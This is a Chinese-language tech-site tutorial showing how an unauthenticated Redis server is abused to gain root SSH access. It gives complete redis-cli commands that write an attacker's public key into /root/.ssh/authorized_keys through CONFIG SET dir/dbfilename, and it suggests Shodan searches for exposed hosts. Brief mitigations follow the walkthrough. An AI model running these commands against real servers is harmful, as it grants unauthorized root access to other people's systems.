新闻资讯  快讯  焦点  财经  政策  社会
互 联 网   电商  金融  数据  计算  技巧
生活百科  科技  职场  健康  法律  汽车
手机百科  知识  软件  修理  测评  微信
软件技术  应用  系统  图像  视频  经验
硬件技术  知识  技术  测评  选购  维修
网络技术  硬件  软件  设置  安全  技术
程序开发  语言  移动  数据  开源  百科
安全防护  资讯  黑客  木马  病毒  移动
站长技术  搜索  SEO  推广  媒体  移动
财经百科  股票  知识  理财  财务  金融
教育考试  育儿  小学  高考  考研  留学
您当前的位置:首页 > IT百科 > 安全防护 > 黑客

利用Redis黑进目标系统

时间:2019-08-16 16:14:30  来源:  作者:

本文旨在让大家注意加强redis的安全,不要去尝试黑别人

在尝试黑进系统之前,我们先来看一下,通过网络空间的搜索引擎,查看全球内暴露在公网中的6379(Redis默认端口)或27017(默认端口)端口号:

利用Redis黑进目标系统

 


利用Redis黑进目标系统

 

ZoomEy不行就用:https://www.shodan.io/search?query=6379

下面我就准备两台服务器进行测试:

10.99.73.7(测试机)

10.99.73.11(攻击目标)

1、测试能否连接到远程主机的redis

$ redis-cli -h 10.99.73.11 -p 6379

10.99.73.11:6379> KEYS *

(empty list or set)

能够看到我链接成功,并且能够使用命令进行正常操作;其实只要能到这一步,基本就已经算成功入侵了。

2、然后将公钥文件内容,写入目标主机的redis

生成自己的公私钥,输入ssh-keygen命令,一路回车

修改id_rsa.pub文件,在文件开头和结尾多添加回次车(最好两次不要多也不要少),必须要加,不然这个公钥过去之后无法使用。

写公钥进redis

$ cat /root/.ssh/id_rsa.pub | redis-cli -h 10.99.73.11 -p 6379 -x set ssh-key

OK

此时,我们再次连接目标主机的redis查看内容,公钥已经写入了目标主机redis

利用Redis黑进目标系统

 

3、将公钥文件写入目标主机上

我们用config命令,分别设置redis写入日志的文件名和目录

10.99.73.11:6379> CONFIG SET dir /root/.ssh

OK

10.99.73.11:6379> CONFIG SET dbfilename "authorized_keys"

OK

10.99.73.11:6379> save

OK

4、验证

使用ssh登录目标主机,此时,已经成功获取linux系统的root账户权限,进入目标主机。

利用Redis黑进目标系统

 

原理

利用redis可以记录日志的能力,将日志写入root用户的.ssh中,从而实现root账户针对攻击者免密登录的权限;

那么有攻击就要有防守,我们应该如何防范这种攻击呢?

方案有两种:

方案1:配置文件中设置允许登录的客户端IP地址:

如: bind 127.0.0.1;

方案2:客户端有密链接服务器 :

如:config set requirepass “password”



Tags:Redis   点击:()  评论:()
声明:本站部分内容来自互联网,内容观点仅代表作者本人,如有任何版权侵犯请与我们联系,我们将立即删除。
▌相关评论
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
▌相关推荐
一、安装Redis1) 本实验采用一主一从,后面文章会持续讲解redis主从,哨兵,cluster2) 主库 192.168.12.131:70013) 从库 192.168.12.131:70024) wget http://download.redis.io/r...【详细内容】
2019-09-19   Redis  点击:(4)  评论:(0)  加入收藏
1、上篇文章已经分享了Redis主从服务构建,接下来分享Redis哨兵服务构建,基础配置在上篇文章已经说过了,不明白的小伙伴可以翻看上篇文章Redis主从,因本文比较简单,大神级可以飘过...【详细内容】
2019-09-19   Redis  点击:(3)  评论:(0)  加入收藏
介绍发布订阅(又称pub/sub)的特点是是订阅者(listener)负责订阅频道(channel),发送者(publisher)负责向频道发送二进制字符串消息。每当有消息被发送至给定频道时,频道的所有订阅者都...【详细内容】
2019-09-19   Redis  点击:(4)  评论:(0)  加入收藏
Redis数据库是一个基于内存的 key-value存储系统,现在redis最常用的使用场景就是存储缓存用的数据,在需要高速读/写的场合使用它快速读/写,从而缓解应用数据库的压力,进而提升应...【详细内容】
2019-09-18   Redis  点击:(6)  评论:(0)  加入收藏
考虑到绝大部分写业务的程序员,在实际开发中使用 Redis 的时候,只会 Set Value 和 Get Value 两个操作,对 Redis 整体缺乏一个认知。所以我斗胆以 Redis 为题材,对Redis 常见问...【详细内容】
2019-09-12   Redis  点击:(8)  评论:(0)  加入收藏
我们的Redis必须使用数据持久化吗?如果我们的Redis服务器只作为缓存使用,Redis中存储的所有数据都是从其他地方同步过来的备份,那么就没必要开启数据持久化的选项。Redis提供了...【详细内容】
2019-09-12   Redis  点击:(10)  评论:(0)  加入收藏
在 Redis 出现之前,我们的缓存框架各种各样,有了 Redis ,缓存方案基本上都统一了,关于 Redis,之前有一个系列教程,尚不了解 Redis 的小伙伴可以参考这个教程: Redis 教程合集使用...【详细内容】
2019-09-11   Redis  点击:(7)  评论:(0)  加入收藏
本文将Redis的设计原理从基础到设计器全部都有讲解,内容较多,建议先收藏再找个合适的时候阅读 1.简介Redis中的每个Key-Value在内存中都会被划分成DictEntry、RedisObject以及...【详细内容】
2019-09-09   Redis  点击:(5)  评论:(0)  加入收藏
Redis的主从复制机制是指可以让从服务器(slave)能精确复制主服务器(master)的数据,如下图所示:...【详细内容】
2019-09-06   Redis  点击:(11)  评论:(0)  加入收藏
这是一道真真实实的阿里面试题:“请解释下为什么鹿晗发布恋情的时候, 微博系统会崩溃,如何解决?”哎,我原本以为认真学技术就可以了。但面试官的这个面试题还得让我关注明显恋...【详细内容】
2019-09-04   Redis  点击:(31)  评论:(0)  加入收藏
前阵子开发了公司领劵中心的项目,这个项目是以redis作为关键技术落地的。先说一下领劵中心的项目吧,这个项目就类似京东app的领劵中心,当然图是截取京东的,公司的就不截了&helli...【详细内容】
2019-09-04   Redis  点击:(11)  评论:(0)  加入收藏
热Key问题所谓热key问题就是,突然有几十万的请求去访问redis上的某个特定key。那么,这样会造成流量过于集中,达到物理网卡上限,从而导致这台redis的服务器宕机。那接下来这个ke...【详细内容】
2019-09-03   Redis  点击:(12)  评论:(0)  加入收藏
redis是一种基于键值对(key-value)数据库,其中value可以为string、hash、list、set、zset等多种数据结构,可以满足很多应用场景。还提供了键过期,发布订阅,事务,流水线,等附加功能...【详细内容】
2019-09-02   Redis  点击:(11)  评论:(0)  加入收藏
Redis的数据结构Redis支持多种不同的数据结构,包括5种基础数据结构和几种比较复杂的数据,这些数据结构可以满足不同的应用场景。 五种基础数据结构 String:字符串,是构建其他数...【详细内容】
2019-09-02   Redis  点击:(13)  评论:(0)  加入收藏
基于本机内存的缓存为了解决调用API依然需要2秒的问题,经过排查,其主要原因在于使用SQL获取热点新闻的过程中消耗了将近2秒的时间,于是乎,我们又想到了一个简单粗暴的解决方案,即...【详细内容】
2019-08-30   Redis  点击:(13)  评论:(0)  加入收藏
平常我们我接触最多的是5个入门级数据结构:String,Hash,List,Set,Sorted Set。本文介绍3个高级数据结构:Bitmaps,Hyperloglogs,GEO。...【详细内容】
2019-08-27   Redis  点击:(20)  评论:(0)  加入收藏
01前言在我们日常的开发中,无不都是使用数据库来进行数据的存储,由于一般的系统任务中通常不会存在高并发的情况,所以这样看起来并没有什么问题,可是一旦涉及大数据量的需求,比如...【详细内容】
2019-08-26   Redis  点击:(26)  评论:(0)  加入收藏
在高并发的业务场景下,数据库大多数情况都是用户并发访问最薄弱的环节。所以,就需要使用redis做一个缓冲操作,让请求先访问到redis,而不是直接访问MySQL等数据库。 这个业务场景...【详细内容】
2019-08-26   Redis  点击:(27)  评论:(0)  加入收藏
Redis是一种基于键值对(Key-Value)的NoSQL数据库,Redis的Value可以由String,hash,list,set,zset,Bitmaps,HyperLogLog等多种数据结构和算法组成。Redis还提供了键过期,发布订阅,事务,Lua脚本,哨兵,Cluster等功能。Redis执行命令的...【详细内容】
2019-08-26   Redis  点击:(26)  评论:(0)  加入收藏
URL去重应用URL去重广泛应用于网络爬虫方面,主要体现在以下两点: 实现增量爬虫时,需要判断哪些网页已经爬取了,哪些网页是新产生的,对新产生的网页,增量爬虫需要抓取其内容; 避免爬...【详细内容】
2019-08-26   Redis  点击:(29)  评论:(0)  加入收藏
推荐资讯
相关文章
栏目更新
栏目热门